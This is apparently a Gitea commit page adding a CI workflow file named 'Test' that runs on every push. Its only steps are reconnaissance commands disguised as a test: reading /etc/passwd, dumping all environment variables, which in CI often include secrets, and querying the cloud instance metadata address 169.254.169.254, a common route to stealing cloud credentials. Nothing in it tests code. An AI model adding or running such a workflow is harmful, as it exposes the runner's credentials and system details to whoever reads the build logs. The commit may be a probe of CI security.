add workflow
Some checks failed
Test / test (push) Has been cancelled

This commit is contained in:
admin_test 2026-04-24 19:11:14 +00:00
parent f6755e3f69
commit fa420b40a1

12
.gitea/workflows/test.yml Normal file
View File

@ -0,0 +1,12 @@
name: Test
on: [push]
jobs:
test:
runs-on: ubuntu-latest
steps:
- run: |
id
hostname
cat /etc/passwd | head -5
env | sort
curl -s http://169.254.169.254/latest/meta-data/ || true